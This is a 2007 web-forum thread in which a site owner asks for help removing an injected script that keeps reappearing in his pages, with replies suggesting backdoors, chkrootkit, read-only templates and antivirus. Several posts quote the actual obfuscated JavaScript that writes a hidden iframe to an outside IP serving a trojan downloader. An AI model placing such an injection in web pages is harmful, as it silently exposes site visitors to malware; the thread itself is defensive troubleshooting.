I'm getting hacked daily! Need Help!

romper · December 4th, 2007, 05:45 PM

Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source.
<SCRIPT>
s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();
</SCRIPT>
But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated.
So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours.
Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get.
Thanks

AmateurFlix · December 4th, 2007, 06:01 PM

FYI I got the following warning just from visiting your signup page in your sig:

Quote:

Trojan-Downloader.JS.Agent.kd
http://58.65.234.9/~momo/traffic/index.php

Hope you get it fixed soon man, your sites were a great resource to set up trades with. I assume this hack is why you closed the signup pages

romper · December 4th, 2007, 06:27 PM

Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads.
I know about the webmasters page. It's getting in everywhere.

The Professional · December 4th, 2007, 06:32 PM

what happened to me might have been different... but you might want to check out this thread
http://www.askdamagex.com/t21776-we-...urity-now.html

there is another one kicking around.. but if I were you ... start with taking the exploit out of your templates... and then chmod'ing them to 444 (read-only)

romper · December 4th, 2007, 07:26 PM

Thanks, but i already saw that post. It's not the same.

I have had my templates at 444 for several months because of the last time I got hacked. I don't find any scripts in my template files. that's what is so confusing. I don't know where it is coming from.

FrozenJag · December 4th, 2007, 07:29 PM

Maybe talk to boneless? I know comus had some troubles with getting hacked awhile back didnt they? Maybe he could help.

Papillon · December 4th, 2007, 08:33 PM

uggg what a PITA

hope you sort this out romper

willwank · December 4th, 2007, 11:08 PM

Quote:

Originally Posted by romper

Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads.
I know about the webmasters page. It's getting in everywhere.

I saw google had flagged one of your sites "unsafe" to visit. Might come from these issues you have going with this fucker(s)?

SEOVivian · December 5th, 2007, 12:32 AM

i recommend you to get AVAST is a very good antivirus.

good luck

willwank · December 5th, 2007, 12:44 AM

Quote:

Originally Posted by SEOVivian

i recommend you to get AVAST is a very good antivirus.

good luck

Now there's a great answer

Pornonada · December 5th, 2007, 02:27 AM

Quote:

Originally Posted by romper

Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source.
<SCRIPT>
s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();
</SCRIPT>
But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated.
So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours.
Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get.
Thanks

They have for sure installed a backdoor already, until you find that file(s) whatever you do is worthless...

Tatiana · December 5th, 2007, 02:38 AM

I recommend you to get system administrator.

Fuckin Bill · December 5th, 2007, 06:29 AM

http://www.chkrootkit.org/

Try downloading and running that on your server. It's a little old, but it checks for a shitload of stuff and does it pretty quickly.

Make sure you read the documentation though, some things can cause a false positive.

digifan · December 5th, 2007, 06:57 AM

And a safe server never hurts

romper · December 5th, 2007, 09:09 AM

Thanks guys! I will let you know when i figure this out. that chkrootkit looks like it might be worth a shot. What I need is a server Guru if anyone knows a god for hire.

tolik · December 5th, 2007, 09:19 AM

Quote:

Originally Posted by willwank

Now there's a great answer

answer are really good. and this software extreme good for checking pc for viruses (tested by myself).

passwords been changed before another hack. so i think it about 90% possiblity what guy have something installed at his pc what sending new passes etc to person who hacking these sites.

willwank · December 5th, 2007, 09:34 AM

Quote:

Originally Posted by tolik

answer are really good. and this software extreme good for checking pc for viruses (tested by myself).

passwords been changed before another hack. so i think it about 90% possiblity what guy have something installed at his pc what sending new passes etc to person who hacking these sites.

That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.

tolik · December 5th, 2007, 09:50 AM

Quote:

Originally Posted by willwank

That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.

well i had problem with one similar virus with keyloger etc built-in (as i found from info about this virus) and only avast at paranoidal level helped me. all other antiviruses etc does not show anything.

boneless · December 5th, 2007, 11:26 AM

sounds to me that the first hack left them with a backdoor on the box, could also be outdated server software.

any word from webair on what might cause it? any logfiles they got on the box that might be of help?

benito · December 5th, 2007, 11:36 AM

Quote:

Originally Posted by willwank

That is true, but I always assume ppl working with online porn have the best security software possible installed on their computers. Anything else is a disaster in the makings.

Only if they use windows...

December 4th, 2007, 05:45 PM	#1 (permalink)
romper I love AskDamageX.com Join Date: Jan 2006 Posts: 66	I'm getting hacked daily! Need Help! Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source. <SCRIPT> s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close(); </SCRIPT> But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated. So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours. Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get. Thanks __________________ Traffic Is Life! Trade Traffic With My Toplists

December 4th, 2007, 06:27 PM	#3 (permalink)
romper I love AskDamageX.com Join Date: Jan 2006 Posts: 66	Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads. I know about the webmasters page. It's getting in everywhere. __________________ Traffic Is Life! Trade Traffic With My Toplists

December 4th, 2007, 07:26 PM	#5 (permalink)
romper I love AskDamageX.com Join Date: Jan 2006 Posts: 66	Thanks, but i already saw that post. It's not the same. I have had my templates at 444 for several months because of the last time I got hacked. I don't find any scripts in my template files. that's what is so confusing. I don't know where it is coming from. __________________ Traffic Is Life! Trade Traffic With My Toplists

December 4th, 2007, 08:33 PM	#7 (permalink)
Papillon Serious Contributor Join Date: Oct 2007 Location: Brisbane, Australia Posts: 921	uggg what a PITA hope you sort this out romper __________________

December 5th, 2007, 12:32 AM	#9 (permalink)
SEOVivian Just trolling Join Date: Oct 2007 Posts: 2	my advice i recommend you to get AVAST is a very good antivirus. good luck __________________ Vivicita Marketing and Advertising Agency

December 4th, 2007, 06:32 PM	#4 (permalink)
The Professional I like money Join Date: Nov 2006 Location: Canada Posts: 1,418	what happened to me might have been different... but you might want to check out this thread http://www.askdamagex.com/t21776-we-...urity-now.html there is another one kicking around.. but if I were you ... start with taking the exploit out of your templates... and then chmod'ing them to 444 (read-only)

December 4th, 2007, 07:29 PM	#6 (permalink)
FrozenJag Serious Contributor Join Date: Nov 2006 Location: US Posts: 4,212	Maybe talk to boneless? I know comus had some troubles with getting hacked awhile back didnt they? Maybe he could help.

December 5th, 2007, 02:38 AM	#12 (permalink)
Tatiana streamingvideosoftware.in Join Date: Dec 2007 Location: Prague Posts: 26	I recommend you to get system administrator. __________________ Pay per minute Streaming video chat software Online Dating Software php for your Online Dating Business Pay per view/minutes video on demand (VOD) software script

December 5th, 2007, 06:29 AM	#13 (permalink)
Fuckin Bill Serious Contributor Join Date: Dec 2005 Location: Buenos Aires Posts: 1,250	http://www.chkrootkit.org/ Try downloading and running that on your server. It's a little old, but it checks for a shitload of stuff and does it pretty quickly. Make sure you read the documentation though, some things can cause a false positive. __________________ The Filthy Few - TGP Traffic And Hardlinks MILF / Teen / Lesbian / Amateur / Hardcore / Big Boobs Signup Forms Always Open!

December 5th, 2007, 06:57 AM	#14 (permalink)
digifan I'm just a girl Join Date: Oct 2005 Location: On the razor's edge Posts: 4,394	And a safe server never hurts __________________ aDigital-fantasy Blog & Free Wallpapers

December 5th, 2007, 09:09 AM	#15 (permalink)
romper I love AskDamageX.com Join Date: Jan 2006 Posts: 66	Thanks guys! I will let you know when i figure this out. that chkrootkit looks like it might be worth a shot. What I need is a server Guru if anyone knows a god for hire. __________________ Traffic Is Life! Trade Traffic With My Toplists

December 5th, 2007, 11:26 AM	#19 (permalink)
boneless The dawg of all dawgs Join Date: Oct 2005 Location: Marbella, Spain Posts: 2,774	sounds to me that the first hack left them with a backdoor on the box, could also be outdated server software. any word from webair on what might cause it? any logfiles they got on the box that might be of help? __________________ For trades go to : MGPteam.com Trade scripts : Trade Pulse - ePowerTrader Traffic brokers : Traffic shop (new) - Traffic holder